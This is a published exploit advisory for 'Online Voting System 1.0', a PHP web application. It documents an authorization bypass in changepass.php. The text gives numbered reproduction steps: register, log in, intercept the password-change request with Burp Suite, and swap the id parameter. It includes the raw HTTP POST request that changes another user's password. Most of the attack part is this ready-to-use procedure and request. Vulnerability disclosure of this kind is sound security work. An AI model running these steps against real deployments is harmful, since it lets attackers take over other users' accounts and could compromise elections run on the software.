Online Voting System version 1.0 suffers from an authorization bypass vulnerability that allows for the password change of other users.
16768c5f888788b48538184a138bb0bb
# Exploit Title:Online Voting System | Authentication Bypass (Password Change
# Exploit Author: Richard Jones
# Date: 2021-01-29
# Vendor Homepage: https://www.sourcecodester.com/php/14690/online-voting-system-phpmysqli-full-source-code.html
# Software Link:https://www.sourcecodester.com/download-code?nid=14690&title=Online+Voting+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
## Steps to reproduce
# 1. Register an account (any user): http://TARGET/online_voting/registeracc.php
# 2. Login
# 3. Goto change password: http://TARGET/online_voting/changepass.php
# 4. Change the password and intercept the request with Burp Suite
# 5. Change the id paramater (id=7 to, id=1) of the url to another users account, Password will be updated
POST /online_voting/changepass.php?id=7 HTTP/1.1
Host: TARGET
Content-Length: 55
Connection: close
Referer: http://localhost/online_voting/changepass.php?id=7
Cookie: PHPSESSID=t19ph5v0sem2pi0gaap55j08ei
oldpass=a&newpass=a&conpass=a&changepass=Update+Profile